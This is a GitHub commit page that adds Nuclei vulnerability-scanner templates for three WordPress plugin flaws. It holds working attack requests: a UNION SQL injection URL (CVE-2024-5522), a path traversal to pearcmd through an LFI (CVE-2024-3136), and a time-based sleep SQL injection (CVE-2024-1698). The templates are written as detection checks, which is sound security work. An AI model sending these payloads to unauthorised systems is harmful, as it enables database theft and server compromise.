Skip to content

Commit

Permalink
Auto Update Nuclei [Wed Sep 18 12:36:39 UTC 2024] :robot:
Browse files Browse the repository at this point in the history
  • Loading branch information
actions-user committed Sep 18, 2024
1 parent abb7579 commit 1abc21d
Show file tree
Hide file tree
Showing 4 changed files with 160 additions and 2 deletions.
46 changes: 46 additions & 0 deletions plugins/bplugins/html5_video_player/CVE-2024-5522.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,46 @@
id: CVE-2024-5522

info:
name: WordPress HTML5 Video Player < 2.5.27 - SQL Injection
author: JohnDoeAnonITA
severity: critical
description: |
The HTML5 Video Player WordPress plugin before 2.5.27 does not sanitize and escape a parameter from a REST route before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks
remediation: Fixed in 2.5.27
reference:
- https://wpscan.com/vulnerability/bc76ef95-a2a9-4185-8ed9-1059097a506a/
- https://nvd.nist.gov/vuln/detail/CVE-2024-5522
classification:
cvss-score: 9.8
cwe-id: CWE-89
cve-id: CVE-2024-5522
epss-score: 0.04
epss-percentile: 9
cpe: cpe:2.3:a:bplugins:html5_video_player:*:*:*:*:wordpress:*:*:*
metadata:
verified: true
max-request: 1
publicwww-query: "/wp-content/plugins/html5-video-player"
product: html5_video_player
vendor: bplugins
tags: wpscan,cve,cve2024,wordpress,wp-plugin,wp,sqli,html5-video-player

variables:
num: "999999999"

http:
- method: GET
path:
- "{{BaseURL}}/wp-json/h5vp/v1/video/0?id='+union all select concat(0x64617461626173653a,1,0x7c76657273696f6e3a,2,0x7c757365723a,md5({{num}})),2,3,4,5,6,7,8-- -"

matchers-condition: and
matchers:
- type: word
part: body
words:
- '{{md5(num)}}'

- type: status
status:
- 200
# digest: 490a0046304402203fd67002382c9c1b98b641fdd6e608cf7037d3c97adf4155780ead6ea438a974022069028181b50cf8bee33382862eb443b6dc5293098bfce41ac309bf76a6624d18:922c64590222798bb761d5b6d8e72950
3 changes: 1 addition & 2 deletions plugins/salephpscripts/web-directory-free/CVE-2024-3673.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -64,5 +64,4 @@ http:
- type: status
status:
- 200

# digest: 4a0a00473045022024a53152c8b28f338e5f9198d70b737a67acab69fdd8ca5daf150bd83a6c3b47022100d6c5f6a5b5e081bc8dfa72f5b945dce4a66e70b9e0102c85dbe4e8bc5a476072:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100cc841a23323e7d5e18588c14318edcd884a93ce6cc6c2443b33731fd2d76e02e022100d1487d246a14ab80b48e28654ada01f78b6f86be15be827a7dbd7ca49244579e:922c64590222798bb761d5b6d8e72950
65 changes: 65 additions & 0 deletions plugins/stylemixthemes/masterstudy_lms/CVE-2024-3136.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,65 @@
id: CVE-2024-3136

info:
name: MasterStudy LMS <= 3.3.3 - Unauthenticated Local File Inclusion via template
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: The MasterStudy LMS plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.3.3 via the 'template' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other "safe" file types can be uploaded and included.
impact: |
An attacker can read sensitive files, execute arbitrary code, or escalate privileges.
remediation: |
Upgrade MasterStudy LMS to version 3.3.4 or higher to mitigate the vulnerability.
reference:
- https://plugins.trac.wordpress.org/changeset/3064337/masterstudy-lms-learning-management-system/trunk/_core/lms/classes/helpers.php
- https://plugins.trac.wordpress.org/changeset/3064337/masterstudy-lms-learning-management-system/trunk/_core/lms/classes/templates.php
- https://www.wordfence.com/threat-intel/vulnerabilities/id/9a573740-cdfe-4b58-b33b-5e50bcbc4779?source=cve
- https://github.com/drdry2/CVE-2024-3136-Wordpress-RCE
- https://github.com/nomi-sec/PoC-in-GitHub
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-3136
epss-score: 0.00065
epss-percentile: 0.28259
cpe: cpe:2.3:a:stylemixthemes:masterstudy_lms:*:*:*:*:wordpress:*:*:*
metadata:
verified: true
max-request: 2
publicwww-query: "/wp-content/plugins/masterstudy-lms-learning-management-system"
product: masterstudy_lms
vendor: stylemixthemes
tags: cve,cve2024,wp,wordpress,unauth,lfi
variables:
randomstr: "{{randstr_1}}"
marker: "{{base64(randomstr)}}"

http:
- raw:
- |
GET /?p=1 HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-admin/admin-ajax.php?template=../../../../../../../../usr/local/lib/php/pearcmd&+config-create HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=stm_lms_load_content&nonce={{nonce}}&
host-redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- 'contains(to_lower(body_2),"config-create: must have 2 parameters")'
- 'status_code_2 == 200'
condition: and

extractors:
- type: regex
part: body
regex:
- '"load_content":"(\w+?)"'
group: 1
internal: true
name: nonce
# digest: 490a00463044022018775892dbb2446d6b501086a1a6aae7d5bb43c0bb3abadec971a46cb36bd4a5022025be6d8d149132e1b0986595eda7ab8b7f6b2a7fa17907b383af4dc2cb80192f:922c64590222798bb761d5b6d8e72950
48 changes: 48 additions & 0 deletions plugins/wpdeveloper/notificationx/CVE-2024-1698.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,48 @@
id: CVE-2024-1698

info:
name: NotificationX <= 2.8.2 - SQL Injection
author: DhiyaneshDk
severity: critical
description: |
The NotificationX - Best FOMO, Social Proof, WooCommerce Sales Popup & Notification Bar Plugin With Elementor plugin for WordPress is vulnerable to SQL Injection via the 'type' parameter in all versions up to, and including, 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
reference:
- https://plugins.trac.wordpress.org/changeset/3040809/notificationx/trunk/includes/Core/Database.php
- https://plugins.trac.wordpress.org/changeset/3040809/notificationx/trunk/includes/Core/Rest/Analytics.php
- https://www.wordfence.com/threat-intel/vulnerabilities/id/e110ea99-e2fa-4558-bcf3-942a35af0b91?source=cve
- https://github.com/fkie-cad/nvd-json-data-feeds
- https://nvd.nist.gov/vuln/detail/CVE-2024-1698
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-1698
epss-score: 0.00045
epss-percentile: 0.12615
cpe: cpe:2.3:a:wpdeveloper:notificationx:*:*:*:*:wordpress:*:*:*
metadata:
verified: true
max-request: 1
fofa-query: body="/wp-content/plugins/notificationx"
product: notificationx
vendor: wpdeveloper
tags: cve,cve2024,wpscan,wordpress,wp-plugin,notificationx,sqli

http:
- raw:
- |
@timeout 10s
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
matchers:
- type: dsl
dsl:
- 'duration>=5'
- 'status_code == 200'
- 'contains(body, "{\"success\":true}")'
- 'contains(header, "application/json")'
condition: and
# digest: 4a0a00473045022100dc0c2cee22d2614e1a3a15a7318e0f20fd4d87a1169cbc7196d2e41346a50a8c022027708781fc9ab4554ea6cb10af29ed73bf80a5394900b0d0dd7f20638496ca61:922c64590222798bb761d5b6d8e72950

0 comments on commit 1abc21d

Please sign in to comment.